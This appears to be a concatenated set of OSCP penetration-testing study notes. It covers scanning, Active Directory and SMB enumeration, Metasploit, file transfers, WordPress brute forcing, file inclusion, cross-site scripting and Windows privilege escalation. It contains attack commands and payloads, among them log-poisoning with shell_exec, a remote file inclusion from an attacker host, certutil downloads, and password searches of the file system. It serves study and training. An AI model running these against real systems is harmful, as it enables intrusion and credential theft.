and scan all addresses 35 | -T = enables timing options (0-5, default:3) 36 | -v = increases the verbosity, nmap will print results while scan is in progress 37 | ``` 38 | 39 | #### Input list of hosts from file 40 | 41 | ``` 42 | -iL = scans list of IP addresses contained in a txt file 43 | ``` 44 | 45 | #### Outputting scan results 46 | 47 | ``` 48 | -oN = outputs results in normal txt format 49 | -oG = outputs results in greppable format 50 | -oX = outputs results in XML format 51 | -oS = outputs results in script kiddie format 52 | -oA = outputs results in all formats 53 | ``` 54 | -------------------------------------------------------------------------------- /3.-enumeration/active-directory.md: -------------------------------------------------------------------------------- 1 | # Active Directory 2 | 3 | ### Enumeration 4 | 5 | There are numerous tools available for enumerating Active Directory environments. For the OSCP, I recommend picking one or two tools, getting familiar with those tools in the lab environment, and sticking with that tool through the exam. After you earned the OSCP you can explore additional tools and expand your Active Directory knowledge. For my OSCP journey my AD enumeration tool of choice was PowerView.ps1. 6 | 7 | #### Bloodhound 8 | 9 | ``` 10 | pip install bloodhound 11 | bloodhound-python -u user -p pass -d domain -c All 12 | ``` 13 | 14 | #### PowerView 15 | 16 | To use PowerView we first need to modify the powershell execution policy to enable script execution. 17 | 18 | ``` 19 | Set-ExecutionPolicy -ExecutionPolicy (RemoteSigned) or (Bypass) 20 | ``` 21 | 22 | Next, dot source the script. 23 | 24 | ``` 25 | . .\script.ps1 (be sure to include the space between ellipses) 26 | ``` 27 | 28 | #### Basic enumeration (Powerview.ps1) 29 | 30 | ``` 31 | Get-Domain 32 | Get-DomainPolicy 33 | (Get-DomainPolicy).KerberosPolicy 34 | Get-DomainController 35 | Get-DomainUser -Identity student1 36 | Get-NetUser -SPN (Kerberoastable users) 37 | Get-NetUser -PreauthNotRequired (AS-REP Roastable users) 38 | Get-DomainGroup 39 | Get-DomainGroupMember -Identity "Domain Admins" -Recurse 40 | Get-DomainComputer 41 | Get-DomainComputer | select Name 42 | Get-NetComputer -Unconstrained (unconstrained delegation **need to verify**) 43 | Get-DomainUser 44 | Get-DomainUser | select samaccountname 45 | Get-DomainUser -SPN | select serviceprincipalname 46 | Get-NetLoggedon -ComputerName name (requires local admin rights) 47 | Get-DomainGPO 48 | Get-DomainOU | select name 49 | ``` 50 | 51 | #### User hunting 52 | 53 | ``` 54 | Find-LocalAdminAccess -Verbose : Finds all machines on the domain where the current user has local admin access 55 | Find-DomainUserLocation -Verbose 56 | Find-DomainUserLocation -UserGroupIdentity : Find computers where a domain admin (or specified user/group) has sessions 57 | ``` 58 | 59 | -------------------------------------------------------------------------------- /3.-enumeration/22-ssh.md: -------------------------------------------------------------------------------- 1 | # 22 - SSH 2 | 3 | SSH is not typically vulnerable but it often a candidate for password reuse attacks. When enumerating you should check for: 4 | 5 | * Version info (banner grab) 6 | 7 | ``` 8 | ssh 10.10.10.5 9 | ``` 10 | 11 | ### NSE scripts 12 | 13 | ``` 14 | ssh2-enum-algos.nse -- reports algorithms supported 15 | ssh-auth-methods.nse -- provides methods available for authentication 16 | sshv1.nse -- checks for ssh v1 support 17 | ``` 18 | 19 | ### Username enumeration (CVE2018-15473) 20 | 21 | OpenSSH versions prior to and including version 7.7 are vulnerable to username enumeration because there is no delay for invalid users. This makes is possible to conduct a timing attack to identify valid users. 22 | 23 | ``` 24 | To conduct this attack load Metasploit module scanner/ssh/ssh_enumusers 25 | Set the RHOSTS, RPORT, and USERNAME OR USER_FILE options 26 | If using a USER_FILE, any from /usr/share/seclists/Usernames will do 27 | ``` 28 | 29 | ### SSH keys 30 | 31 | When enumerating other services/shares, you should also look for SSH keys. Public keys are commonly stored as "authorized\_keys,", and private keys are commonly stored as "id\_rsa". If you locate a private key you may be able to connect to the remote system via SSH. 32 | 33 | ``` 34 | chmod 600 id_rsa 35 | ssh -i id_rsa user@10.10.10.5 36 | ``` 37 | 38 | ### Credential reuse 39 | 40 | You should also attempt to connect to SSH with any credentials that you discover. 41 | 42 | ``` 43 | ssh user@10.10.10.5 44 | ``` 45 | 46 | ### Creating keys (post exploitation) 47 | 48 | ``` 49 | ssh-keygen 50 | ``` 51 | 52 | ### scp (file transfers over ssh) 53 | 54 | ``` 55 | scp -r username@target-ip:/path/to/foo /home/username/desktop/ 56 | ``` 57 | 58 | Specifying key exchange algorithms 59 | 60 | Occasionally on older systems you'll receive and error indicating that no compatible key exchanges were found. Use the following command(s) to force the use of a specific algorithm. 61 | 62 | ``` 63 | ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@$TargetIP 64 | ssh -o HostKeyAlgorithms=+ssh-rsa root@TargetIP 65 | ``` 66 | -------------------------------------------------------------------------------- /4.-exploitation/metasploit.md: -------------------------------------------------------------------------------- 1 | # Metasploit 2 | 3 | ## Msfconsole 4 | 5 | ### Exploring 6 | 7 | Start: `msfconsole` 8 | 9 | View auxiliary modules: `show auxiliary` 10 | 11 | Use modules: `use auxiliary/scanner/snmp/snmp_enum` 12 | 13 | View module options: `show options` 14 | 15 | Set global session values: `setg RHOSTS 10.11.1.5` 16 | 17 | ### Database access 18 | 19 | MSF logs findings and information about discovered hosts in a database 20 | 21 | View discovered hosts: `hosts` 22 | 23 | Use the db\_nmap wrapper to scan: `db_nmap 10.11.1.5` 24 | 25 | Search for machines open ports: `services -p 443` 26 | 27 | ### Exploit modules 28 | 29 | Search exploits: `search pop3` 30 | 31 | Use exploit: `use exploit/windows/pop3/seattlelab_pass` 32 | 33 | View options: `show options` 34 | 35 | Set options: `set RHOST 10.11.1.5` 36 | 37 | View payloads: `show payloads` 38 | 39 | Select payload: `set payload windows/shell/reverse_tcp` 40 | 41 | View payload options: `show options` 42 | 43 | Once configured, run exploit: `exploit` 44 | 45 | ### **Multi Handler** 46 | 47 | Used to receive callbacks from meterpreter payloads 48 | 49 | `use exploit/multi/handler` 50 | 51 | Set payload to match msfvenom command used to generate shell 52 | 53 | Set IP address and port 54 | 55 | `run` 56 | 57 | ### Meterpreter payloads – provide additional features and functionality 58 | 59 | View system info: `sysinfo` 60 | 61 | View UID: `getuid` 62 | 63 | Search files: `search string` 64 | 65 | Upload files: `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec` two characters required to prevent shell escaping 66 | 67 | Download files: `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe` 68 | 69 | Invoke a command shell: `shell` 70 | 71 | ### Post exploitation 72 | 73 | `help` displays a list of available meterpreter post exploitation commands 74 | 75 | Includes: download, upload, portfwd, route, keyscan\_start/stop, screenshot, record\_mic, webcam\_snap, getsystem \(priv esc\), hashdump 76 | 77 | Useful tool for finding priv esc options `use post/multi/recon/local_exploit_suggester` 78 | 79 | 80 | 81 | -------------------------------------------------------------------------------- /5.-maintaining-access/file-transfers.md: -------------------------------------------------------------------------------- 1 | # File transfers 2 | 3 | Once we gain initial access to our target we may need to upload additional tools to help us elevate privileges or provide easier methods of accessing the machine at a later point. We might also want to download files from the target for use in our report. The following list provides a few common techniques for executing file transfers. 4 | 5 | ### Hosting files via HTTP 6 | 7 | On our attacking machine we have two options for serving files. The first (preferred) method is to run the SimpleHTTPServer Python module in the directory that contains the files we want to transfer. 8 | 9 | ``` 10 | python3 -m http.server 80 11 | python -m SimpleHTTPServer 80 12 | ``` 13 | 14 | Our second option is to use our built in Apache server. To do this we need start the Apache 2 service. Once started our files will be served from var/www/html. 15 | 16 | ``` 17 | systemctl start Apache2 18 | ``` 19 | 20 | Next, we use our target machine to request the desired filed from the server. The method varies slightly depending on the OS of the target machine. 21 | 22 | ### **Built-in OS functions** 23 | 24 | #### **Linux** 25 | 26 | ``` 27 | wget http://sample.com/file.pdf 28 | wget -O report_wget.pdf https://sample.com/report-2013.pdf 29 | -O saves the file with a different name on the local machine 30 | curl -o file.pdf http://attackerip/file.pdf 31 | axel -a -n 20 -o report_axel.pdf https://sample.com/report.pdf 32 | -n --used to specify the number of connections 33 | -a --provides a more concise progress indicator 34 | -o --used to specify a different name for the downloaded file 35 | ``` 36 | 37 | #### **Windows** 38 | 39 | ``` 40 | certutil -urlcache -f http://sourceip/file.exe [c:\desired_destination\desired_]name.exe 41 | ``` 42 | 43 | ### Other alternatives 44 | 45 | #### FTP 46 | 47 | Create an FTP server in the directory you are in, on port 21, allow anonymous access: 48 | 49 | ``` 50 | Python -m pyftpdlib 21 51 | ftp $IPaddressofattacker 52 | ``` 53 | 54 | #### Netcat 55 | 56 | On receiving machine: `nc -nlvp 4444 > incoming.exe` 57 | 58 | On sending machine: `nc – nv 10.11.23.33 4444 < file.exe` 59 | 60 | -------------------------------------------------------------------------------- /3.-enumeration/wordpress.md: -------------------------------------------------------------------------------- 1 | # Wordpress 2 | 3 | ### Manual enumeration 4 | 5 | * Enumerate users by reviewing the archives and taking note of authors of blog posts 6 | * If you identify a login page, attempt to login with common credentials \(admin, password, etc.\). 7 | * Pay attention to errors produced through failed logins 8 | 9 | ### wpscan 10 | 11 | wpscan is an open source scanner included with Kali. 12 | 13 | If you use another distro you can download it here: [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) 14 | 15 | Documentation here: [https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation](https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation) 16 | 17 | #### Enumerating users 18 | 19 | ```text 20 | wpscan --url https://target.tld/ --enumerate u 21 | wpscan --url example.com -e u 22 | wpscan --url https://target.tld/ --enumerate u1-100 23 | ``` 24 | 25 | #### Brute force 26 | 27 | ```text 28 | wpscan --url example.com -e u --passwords /path/to/password_file.txt 29 | ``` 30 | 31 | ```text 32 | wpscan --url example.com --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50 33 | ``` 34 | 35 | #### Scanning plugins 36 | 37 | ```text 38 | wpscan --url example.com -e vp --plugins-detection mixed --api-token YOUR_TOKEN 39 | ``` 40 | 41 | #### Enumeration modes 42 | 43 | To enumerate version, plugins or themes, select from three modes: `passive, aggressive, mixed.` The default is `mixed` for most items, and `passive` for plugin detection. To override the default use the`--plugins-detection` option. 44 | 45 | ```text 46 | Mixed - provides the most results 47 | Passive - useful when server overload is a concern 48 | Aggressive - most aggressive 49 | ``` 50 | 51 | #### Other enumeration options 52 | 53 | The following enumeration options are available and should be preceded by the `-e` flag. If no additional options are provided the default is: `vp,vt,tt,cb,dbe,u,m` 54 | 55 | * `vp` \(Vulnerable plugins\) 56 | * `ap` \(All plugins\) 57 | * `p` \(Popular plugins\) 58 | * `vt` \(Vulnerable themes\) 59 | * `at` \(All themes\) 60 | * `t` \(Popular themes\) 61 | * `tt` \(Timthumbs\) 62 | * `cb` \(Config backups\) 63 | * `dbe` \(Db exports\) 64 | * `u` \(User IDs range. e.g: u1-5\) 65 | * `m` \(Media IDs range. e.g m1-15 66 | 67 | -------------------------------------------------------------------------------- /4.-exploitation/public-exploits.md: -------------------------------------------------------------------------------- 1 | # Public exploits 2 | 3 | ### Exploit Sources 4 | 5 | #### Online exploit sources 6 | 7 | * Exploit Database [https://www.exploit-db.com/](https://www.exploit-db.com/) 8 | * SecurityFocus Exploit Archives [https://bugtraq.securityfocus.com/archive](https://bugtraq.securityfocus.com/archive) 9 | * Packet Storm [https://packetstormsecurity.com/files/tags/exploit/](https://packetstormsecurity.com/files/tags/exploit/) 10 | 11 | #### Offline exploit resources 12 | 13 | * Searchsploit 14 | * Nmap NSE scripts 15 | * The Browser Exploitation Framework (BEEF) 16 | * Metasploit 17 | 18 | ### Fixing exploits 19 | 20 | When using publicly available exploits it is rare that these exploits will work without at least some minor modifications. Others may require more extensive modifications such as updating the payload. 21 | 22 | #### Importing and examining exploits 23 | 24 | * Searchploit includes a mirror function that will copy an exploit into the current working directory `searchsploit -m 43321` 25 | * Headers such as 'winsock' are hints that c programs were intended for compilation on windows and require cross-compilation 26 | 27 | #### Items that commonly require modification 28 | 29 | * Target IP address and port 30 | * Attacking machine IP address and port 31 | * Return address for memory corruption exploits 32 | * Payload (typically generated with msfvenom) 33 | 34 | #### Cross compiling exploit code 35 | 36 | * mingw-w64 is a popular cross compiler available on Linux 37 | * install mingw using `sudo apt install mingw-w64` 38 | * After installation, mingw-w64 can be used to compile Windows PE files 39 | * `i686-w64-mingw32-gcc 42341.c -o syncbreeze.exe` 40 | 41 | #### Fixing web exploits 42 | 43 | There are several additional consideration for modifying web exploits 44 | 45 | * Does the exploit initiate an HTTP or HTTPS connection? 46 | * Does the exploit access a web application through a specific path or route? 47 | * Does the exploit leverage a pre-authentication vulnerability, or are credentials required? 48 | * How are the GET and POST requests crafted to trigger and exploit the vulnerability? 49 | * Does the exploit rely on default application settings that might have been changed at install? 50 | * Will oddities such as self-signed certificates disrupt the exploit? 51 | 52 | -------------------------------------------------------------------------------- /1.-reconnaissance-osint/information-gathering.md: -------------------------------------------------------------------------------- 1 | # Information gathering 2 | 3 | Information gathering is one of the first steps during an engagement. The goal of information gathering is to increase understanding of the target infrastructure, business practices, and information available via open source. The information gathered during this step are used to inform later stages of the engagement. 4 | 5 | The following is a sample checklist for researching a target. 6 | 7 | #### Review the target's public facing website and social media accounts 8 | 9 | * What does the target do? 10 | * How is the organization structured? 11 | * Take note of contact information for key personnel (leadership/management, IT personnel, etc.) 12 | * Collect phone and fax numbers, email addresses, usernames, position titles, pictures, etc. 13 | * Identify email address structures used by the target. 14 | * Identify internal business practices. 15 | * Pay particular attention to "about" pages, as these often contain names, social media links, and email addresses. 16 | 17 | #### Use basic tools to gain additional information about the target's network 18 | 19 | * Perform [whois](cewl.md#whois-enumeration) and [DNS](../3.-enumeration/53-dns.md) enumeration to identify target registrar and DNS information 20 | * Use [Netcraft ](cewl.md#netcraft)and [Google Dorks](google-hacks.md) to attempt to identify technologies used by the target 21 | * Use [Shodan](cewl.md#shodan) to search for additional internet connected computers and devices 22 | * Used [FOCA](cewl.md#foca) to scrape metadata from the target domain(s) 23 | * Use [SSL server test](https://www.ssllabs.com/ssltest/) to analyze SSL configuration 24 | * Check security headers with [securityheaders.com](https://securityheaders.com) 25 | * Check open job postings for mentions of specific technologies 26 | 27 | #### Gather information about target personnel 28 | 29 | * Harvest usernames - use tools like [Hunter.io](https://hunter.io/), [phonebook.cz](https://phonebook.cz/), and [theHarvester](cewl.md#theharvester) to search target domain for usernames, emails, etc. 30 | * Use[ social media tools](cewl.md#social-media-tools) to profile identified personnel 31 | 32 | #### Check public repositories for additional target information 33 | 34 | * GitHub, GitLab, SourceForge, Pastebin 35 | -------------------------------------------------------------------------------- /1.-reconnaissance-osint/google-hacks.md: -------------------------------------------------------------------------------- 1 | # Search Engine OSINT 2 | 3 | ### Search Engine Operators 4 | 5 | Search engine OSINT is a collection of techniques that use search strings and operators to refine search queries. There are numerous useful operators that can be used to search for specific information about a site, domain, or company. These operators will differ for various search engines, the examples below apply specifically to Google. 6 | 7 | * **AND** includes all specified keywords in query (cyber AND war) 8 | * **OR** searches for the presence of one keyword or another (cyber OR war) 9 | * **" "** searches for a specific pattern of words 10 | * **Site** limits searches to a single domain. `site:Microsoft.com` 11 | * **Filetype** limits searches to a specified file type. `site:Microsoft.com filetype:php` 12 | * You can also exclude specific file types using `site:Microsoft.com -filetype:html` 13 | * **Ext** is useful to identify which programming languages are used on the site. `site:Microsoft.com ext:jsp, ext:cfm, ext:pl` 14 | * **Intext** identifies pages with specific terms in the content of the page `intext:"term to search for"` 15 | * **Intitle** identifies pages with specific titles or content. `site:Microsoft.com intitle:"index of"` or `"parent directory"` 16 | * **Inurl** searches for specific terms in a URL `inurl:"keyword` 17 | * **Cache** searches Google's cached pages. `cache:Microsoft.com` 18 | * Limit search to a single domain `site:Microsoft.com` 19 | * Filter specific subdomains `site:Microsoft.com -site:www.microsoft.com` 20 | * Filetype: limits search results to a specified file type `site:domain.com -filetype:html` 21 | * Ext: useful for discerning programming languages used `ext:jsp, ext:cfm, ext:pl` 22 | * Intitle: can help identify pages with specific titles or content `Intitle:”index of" "parent directory"` 23 | 24 | ### Important links 25 | 26 | * Google hacking database: [https://www.exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database) 27 | * Google - [https://www.google.com/](https://www.google.com/) 28 | * Google Advanced Search - [https://www.google.com/advanced\_search](https://www.google.com/advanced_search) 29 | * Google Search Guide - [http://www.googleguide.com/print/adv\_op\_ref.pdf](http://www.googleguide.com/print/adv_op_ref.pdf) 30 | * Bing - [https://www.bing.com/](https://www.bing.com/) 31 | * Yandex - [https://yandex.com/](https://yandex.com/) 32 | * DuckDuckGo - [https://duckduckgo.com/](https://duckduckgo.com/) 33 | * DuckDuckGo Search Guide - [https://help.duckduckgo.com/duckduckgo-help-pages/results/syntax/](https://help.duckduckgo.com/duckduckgo-help-pages/results/syntax/) 34 | * Baidu - [http://www.baidu.com/](https://www.baidu.com/) 35 | -------------------------------------------------------------------------------- /4.-exploitation/web-application-attacks/file-inclusion.md: -------------------------------------------------------------------------------- 1 | # File inclusion 2 | 3 | File inclusion vulnerabilities allow an attacker to include a file into the application's running code. Local file inclusions occur when a file is loaded from the web server hosting the application; whereas, remote file inclusions include a file loaded from an external source. These vulnerabilities are most commonly found in PHP applications. 4 | 5 | #### Detection 6 | 7 | File inclusions are identified in the same way as directory traversals--by identifying parameters and attempting to manipulate them. If we locate URLs that include parameters, we should test for both vulnerabilities. 8 | 9 | * Look for any instances where a web application retrieves files and includes contents from the file in the reponse (templates, documents/images/framed content) 10 | * For LFI we attempt to access system files `/../../../Windows/win.ini` 11 | * If successful, we can attempt to read files already stored on the server. 12 | * Impact ranges from disclosure to remote code execution 13 | 14 | {% hint style="info" %} 15 | In PHP versions below 5.3, terminate the request with a null byte "(%00)" 16 | {% endhint %} 17 | 18 | #### Contaminating log files 19 | 20 | Use netcat to connect to the target machine on port 80, then send the following command: 21 | 22 | ``` 23 | ' . shell_exec($_GET[‘cmd’]) . '';?> 24 | ``` 25 | 26 | Although we receive a "Bad Request" in netcat, the command is stored in the server's logs. Once logged, we can attempt command execution. 27 | 28 | ``` 29 | http://10.34.5.34/index.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig 30 | ``` 31 | 32 | If successful, the successful ipconfig output will be returned 33 | 34 | #### Remote File Inclusion 35 | 36 | RFIs are less common than LFIs due to typical default server configuration restrictions. 37 | 38 | ``` 39 | http://10.34.5.34/index.php?file=http://attackerip/evil.txt 40 | ``` 41 | 42 | If successful, we can modify evil.txt with PHP similar to used in the log file example to gain remote code execution. 43 | 44 | #### PHP wrappers 45 | 46 | PhP provides several data wrappers that can be used to exploit directory traversal and LFI vulnerabilities. The data wrappers allows us to embed inline data into the URL in plaintext or Base64. **This can be used as an alterative when we cannot poison a local file with PHP code.** 47 | 48 | * The wrapper begins with "data:", followed by the type of data "text/plain,". The contents of the data begin after the comma. 49 | * Test: `http://ipaddress/menu.php?file=data:text/plain, hello world` 50 | * If the test succeeds, we can attempt to use php to execute commands 51 | * `http://ipaddress/menu.php?file=data:text/plain,` 52 | 53 | ### 54 | -------------------------------------------------------------------------------- /3.-enumeration/139-445-netbios-smb.md: -------------------------------------------------------------------------------- 1 | # 139/445 - NetBIOS/SMB 2 | 3 | ### NetBIOS/Server Message Block 4 | 5 | NetBIOS listens on TCP 139 and several UDP ports. SMB (TCP 445) and NetBIOS are separate protocols; however, modern implementations of SMB often utilize NetBIOS over TCP for backwards compatibility. SMB has a history of vulnerabilities but we are primarily interested in SMB for enumeration of shares to search for credentials, backups and other information that may help us gain a foothold. 6 | 7 | We can search for NetBios/SMB hosts using nmap or nbtscan: 8 | 9 | ``` 10 | nmap -v -p 139,445 10.11.1.1-254 11 | sudo nbtscan -r 10.11.1.0/24 12 | ``` 13 | 14 | #### NSE scripts 15 | 16 | * Viewable with `ls -l /usr/share/nmap/scripts/smb*` 17 | 18 | ``` 19 | nmap -p 139,445 --script=smb* 10.11.1.75 20 | nmap --script=smb-enum* 10.11.1.227 21 | nmap -p 139,445 --script=smb-enum-users 10.11.1.75 22 | nmap -v -p 139,445 -oG smb.txt 10.11.1.1-245 –open 23 | nmap --script smb-vuln-* 10.10.10.40 24 | nmap -p 139,445 --script=smb-os-discovery 10.10.10.40 25 | ``` 26 | 27 | #### CrackMapExec 28 | 29 | ``` 30 | crackmapexec smb $ip_range -u '' -p '' (enumerate null shares) 31 | crackmapexec smb $ip_range --pass-pol 32 | crackmapexec smb $ip_range --users 33 | crackmapexec smb $ip_range --groups 34 | crackmapexec smb $ip_range -u user -p 'password' -d domain --shares 35 | crackmapexec smb $ip_address -u user -p 'password' -d domain --shares --spider "C$" --pattern "pass" 36 | ``` 37 | 38 | ### smbclient 39 | 40 | ``` 41 | smbclient -L \\$ip\\ -U [[domain\\]username] 42 | smbclient -L \\\\$ip\\ 43 | smbclient -L \\\\$ip\\$share 44 | 45 | *connect to share* 46 | smbclient \\\\$ip\\$share 47 | smbclient \\\\$ip\\$share -U domain\\username 48 | ``` 49 | 50 | ### enum4linux 51 | 52 | ``` 53 | enum4linux 10.11.1.127 54 | enum4linux -a -v 10.11.1.227 55 | ``` 56 | 57 | ### showmount 58 | 59 | ``` 60 | showmount -a $targetip (all) 61 | showmount -e $targetip (exports) 62 | ``` 63 | 64 | ### mount 65 | 66 | ``` 67 | mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share 68 | ``` 69 | 70 | ### Download shares 71 | 72 | ``` 73 | get log.txt --allows you to download single files 74 | smbget -R smb://ipaddress/sharename 75 | ``` 76 | 77 | ### smbclient.py 78 | 79 | ``` 80 | python3 /opt/impacket/examples/smbclient.py username@target-ip 81 | python3 /opt/impacket/examples/smbclient.py 'username'@target-ip 82 | python3 /opt/impacket/examples/smbclient.py ''@target-ip 83 | ``` 84 | 85 | ### Eternal Blue 86 | 87 | * Metasploit module available, search MS17-010 in MSFconsole 88 | * Manual - [https://github.com/3ndG4me/AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) 89 | * Link includes a python script to check for vulnerability **eternal\_checker.py** 90 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [Welcome](README.md) 4 | * [Source Zero Con References](source-zero-con-references.md) 5 | 6 | ## 1. Reconnaissance/ OSINT 7 | 8 | * [Information gathering](1.-reconnaissance-osint/information-gathering.md) 9 | * [OSINT tools](1.-reconnaissance-osint/cewl.md) 10 | * [Search Engine OSINT](1.-reconnaissance-osint/google-hacks.md) 11 | * [Sock puppets](1.-reconnaissance-osint/sock-puppets.md) 12 | 13 | ## 2. Scanning 14 | 15 | * [Host discovery](2.-scanning/host-discovery.md) 16 | * [Port Scanning with Nmap](2.-scanning/port-scanning-with-nmap.md) 17 | * [Nmap Scripting Engine](2.-scanning/nmap-scripting-engine.md) 18 | 19 | ## 3. Enumeration 20 | 21 | * [21 - FTP](3.-enumeration/21-ftp.md) 22 | * [22 - SSH](3.-enumeration/22-ssh.md) 23 | * [25 - SMTP](3.-enumeration/25-smtp.md) 24 | * [53 - DNS](3.-enumeration/53-dns.md) 25 | * [80/443 - HTTP(s)](3.-enumeration/80-443-http-s.md) 26 | * [111 - NFS](3.-enumeration/111-nfs.md) 27 | * [135 - RPC](3.-enumeration/135-rpc.md) 28 | * [139/445 - NetBIOS/SMB](3.-enumeration/139-445-netbios-smb.md) 29 | * [161 (UDP) - SNMP](3.-enumeration/161-udp-snmp.md) 30 | * [Wordpress](3.-enumeration/wordpress.md) 31 | * [Finger (Solaris)](3.-enumeration/finger-solaris.md) 32 | * [Active Directory](3.-enumeration/active-directory.md) 33 | 34 | ## 4. Exploitation 35 | 36 | * [Public exploits](4.-exploitation/public-exploits.md) 37 | * [Web application attacks](4.-exploitation/web-application-attacks/README.md) 38 | * [Command injection](4.-exploitation/web-application-attacks/command-injection.md) 39 | * [Cross site scripting](4.-exploitation/web-application-attacks/cross-site-scripting.md) 40 | * [Directory traversal](4.-exploitation/web-application-attacks/directory-traversal.md) 41 | * [File inclusion](4.-exploitation/web-application-attacks/file-inclusion.md) 42 | * [SQL injection](4.-exploitation/web-application-attacks/sql-injection.md) 43 | * [Password attacks](4.-exploitation/password-attacks.md) 44 | * [Buffer overflows](4.-exploitation/buffer-overflows.md) 45 | * [Active Directory](4.-exploitation/active-directory.md) 46 | * [Metasploit](4.-exploitation/metasploit.md) 47 | 48 | ## 5. Maintaining access 49 | 50 | * [Upgrading simple shells](5.-maintaining-access/shells.md) 51 | * [Reverse shells](5.-maintaining-access/shells-1.md) 52 | * [MSFvenom](5.-maintaining-access/msfvenom.md) 53 | * [File transfers](5.-maintaining-access/file-transfers.md) 54 | * [Linux privilege escalation](5.-maintaining-access/linux-privilege-escalation.md) 55 | * [Windows privilege escalation](5.-maintaining-access/windows-privilege-escalation.md) 56 | * [Tunneling/Port Forwarding](5.-maintaining-access/tunneling.md) 57 | 58 | ## 6. Miscellaneous 59 | 60 | * [Connections](6.-miscellaneous/connections.md) 61 | 62 | ## 7. Walkthroughs 63 | 64 | * [HTB - Blunder](7.-walkthroughs/htb-blunder.md) 65 | * [HTB - Haircut](7.-walkthroughs/htb-haircut.md) 66 | * [THM -HackPark](7.-walkthroughs/thm-hackpark.md) 67 | -------------------------------------------------------------------------------- /4.-exploitation/web-application-attacks/cross-site-scripting.md: -------------------------------------------------------------------------------- 1 | # Cross site scripting 2 | 3 | Well-designed web pages typically sanitize user inputs to remove dangerous characters or strings. Cross site scripting occurs when data is not sanitized and attackers are able to inject inputs that are subsequently displayed on the web page. 4 | 5 | There are three variants of cross-site scripting: 6 | 7 | * Stored - occurs when the injected payload is stored on the server. The payload is subsequently displayed to anyone who visits the page. 8 | * Affects all users of the site 9 | * Often found in forum software, especially in comments sections or product reviews 10 | * Reflected - occurs when injected payloads are placed into the page content through a form or link. Reflected XSS only affects the person performing the action. 11 | * Only attacks the person submitting the request or viewing the link 12 | * Often occurs in search field and results, as well as anywhere user input is included in error messages 13 | * DOM-Based - take place solely in a page's Document Object Model (DOM). 14 | * Occurs when a page's DOM is modified with user-controlled content 15 | 16 | All three variants can result in session hijacking, redirects and script execution. 17 | 18 | #### Detecting 19 | 20 | Detection is accomplished through reviewing web pages for input fields and testing to determine if those fields accept unsanitized inputs. Commonly sanitized characters (useful for testing) include: 21 | 22 | ``` 23 | < > ' " { } ; 24 | ``` 25 | 26 | If the application does not remove these characters, it may be vulnerable to XSS. 27 | 28 | #### Basic example 29 | 30 | * We discover a web page that includes a form for users to provide feedback 31 | * Posting a test message of `hello " ; <>` results in no filtering of the input 32 | * We then use a basic payload like "``" 33 | * After submitting, we receive a popup 34 | * Because this user feedback is written to a database, this is a stored xss vulnerability and all users that visit the page will receive the popup 35 | 36 | #### **Injecting content** 37 | 38 | A more malicious version of this attacks includes injecting invisible iframes into a victims browser. 39 | 40 | ``` 41 | 42 | ``` 43 | 44 | When the victim visits the infected page, their browser attempts to download the linked item and establishes a connection with the attacking machine (requires a netcat listener on port 80) 45 | 46 | #### **Stealing cookies and session information** 47 | 48 | Cross site scripting can also be used to steal cookies and session information from site visitors. 49 | 50 | ``` 51 | 52 | ``` 53 | 54 | When a victim visits the page, their browser established a connection back to the attacking machine with an authenticated session id (listener required) 55 | 56 | Once we have the session id, we can set it in our browser using a tool like Cookie-Editor, and browse to the page without providing credentials (assuming the cookie we captured was for an authenticated user). 57 | -------------------------------------------------------------------------------- /5.-maintaining-access/windows-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | # Windows privilege escalation 2 | 3 | ## Manual enumeration 4 | 5 | ### User 6 | 7 | ``` 8 | whoami 9 | net user username 10 | ``` 11 | 12 | ### Other Users 13 | 14 | ``` 15 | net user 16 | ``` 17 | 18 | ### Privileges 19 | 20 | ``` 21 | whoami /priv 22 | ``` 23 | 24 | ### Hostname 25 | 26 | ``` 27 | hostname 28 | ``` 29 | 30 | ### OS and architecture 31 | 32 | ``` 33 | systeminfo 34 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 35 | ``` 36 | 37 | ### Processes and services 38 | 39 | ``` 40 | tasklist /SVC 41 | ``` 42 | 43 | ### Network 44 | 45 | ``` 46 | ipconfig /all (interfaces) 47 | route print (routing table) 48 | netstat -ano (active connections) 49 | arp -a 50 | ``` 51 | 52 | ### Firewall/AV status 53 | 54 | ``` 55 | sc query windefend 56 | sc query type=service 57 | netsh 58 | netsh advfirewall show rule name -all 59 | netsh advfirewall dump 60 | netsh firewall show state 61 | netsh advfirewallshow currentprofile 62 | ``` 63 | 64 | ### Applications/patch levels/drivers/kernel modules 65 | 66 | ``` 67 | wmic product get name 68 | wmic product get version 69 | wmic product get vendor 70 | wmic product get name, version, vendor 71 | wmic qfe 72 | wmic qfe get Caption, Description, HotFixID, InstalledOn 73 | (PS) driverquery.exe /v /fo csv |ConvertFrom -CSV | Select-Object 'Display Name', 'Start Mode', Path 74 | (PS) Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DeviceVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMWare*"} 75 | ``` 76 | 77 | ### Readable/writeable directories 78 | 79 | ``` 80 | accesschk.exe -uws "Everyone" "C:\Program Files" (SysInternalsSuite) 81 | (PS) Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString-match "Everyone\sAllow\s\sModify"} 82 | ``` 83 | 84 | ### Mounted/unmounted disks 85 | 86 | ``` 87 | mountvol 88 | wmic logicaldisk 89 | list drives 90 | ``` 91 | 92 | ### Passwords 93 | 94 | ``` 95 | findstr /si password *.txt 96 | findstr /si password *.xml 97 | findstr /si password *.ini 98 | dir /s *pass* == *cred* == *vnc* == *.config* 99 | findstr /spin “password” *.* 100 | ``` 101 | 102 | ### Scheduled tasks 103 | 104 | ``` 105 | schtasks /query /FO LIST /v 106 | ``` 107 | 108 | ### Binaries that auto elevate 109 | 110 | ``` 111 | reg query 